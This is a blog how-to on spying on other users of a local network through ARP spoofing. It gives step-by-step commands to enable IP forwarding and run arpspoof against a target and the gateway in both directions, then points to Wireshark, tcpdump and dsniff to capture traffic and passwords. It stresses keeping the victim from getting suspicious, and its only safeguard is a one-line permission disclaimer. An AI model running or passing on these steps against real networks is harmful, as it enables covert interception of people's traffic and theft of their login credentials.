How-To spy on other users on the local network

Sometimes it’s nice to know what kind of people you’re sharing a LAN with. This hack will allow you to sniff packets from other users on the Local Switched network. What we accomplish by ARP spoofing is tricking a host on the LAN into forwarding us packets that normally would only be sent to the gateway (or the machine or router thats going to send them off to the internet)

****Disclaimer****
This should only ever be done on a network that you run or otherwise have permission to monitor other users activities.

This tutorial should apply to any *nix based Operating system with little modification

The first thing we need to do this is the dsniff suite of applications you can install this via darwin ports for OS X. In Linux you can normally install it via the package manager for your os (eg, yum or apt ).

Next we need to turn on IP forwarding in the OS. This is so packets are forwarded on to their intended destination so whoever we’re spying on won’t get suspicious.

OS X

sysctl -w net.inet.ip.forwarding=1

Linux

echo 1 > /proc/sys/net/ipv4/ip_forward

Next we begin ARP spoofing using the “arpspoof” command from the dsniff suite

arpspoof -t xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy

xxx.xxx.xxx.xxx is the target of our ARP spoof (The host who’s packets we want to capture) and yyy.yyy.yyy.yyy is the host we want to pretend to be (This should be the default gateway for the network).

You should see output similar to the following

0:1b:63:b6:df:b1 ff:ff:ff:ff:ff:ff 0806 42: arp reply yyy.yyy.yyy.yyy is-at 0:1b:63:b6:df:b1
0:1b:63:b6:df:b1 ff:ff:ff:ff:ff:ff 0806 42: arp reply yyy.yyy.yyy.yyy 0 is-at 0:1b:63:b6:df:b1

Now open up your favorite packet sniffer and you should see traffic from the target going out to the internet.

Some good packet sniffers are Wireshark and tcpdump

Or if you’re just after password or other login information fire up dsniff and it’ll keep watch for any passwords sent over the connection.

Note that we’ve setup a one way ARP spoof here so we’re only going to see traffic from the target out to the internet. If we want to see things the other way as well open up another console window and run a second instance of arpspoof in reverse.

so

arpspoof -t yyy.yyy.yyy.yyy xxx.xxx.xxx.xxx

Where yyy.yyy.yyy.yyy is again the gateway and xxx.xxx.xxx.xxx is the target this way we see traffic in both directions.

As always let me know if you have any questions or comments in the comments of this post.

If you enjoyed this post, make sure you subscribe to my RSS feed!

Published by

LiamM

I'm a self labeled Nerd who enjoys Playing Video Games, restoring classic muscle cars (i have a 65' Mustang in the works) , Running Big Data Clusters, Tattoos, Working on System Automation, Riding and customizing Motorcycles, and writing python Code. I'm an SRE with DemonWare/Activision Specializing in Big Data/Hadoop operations but all opinions and views expressed on this site are solely my own.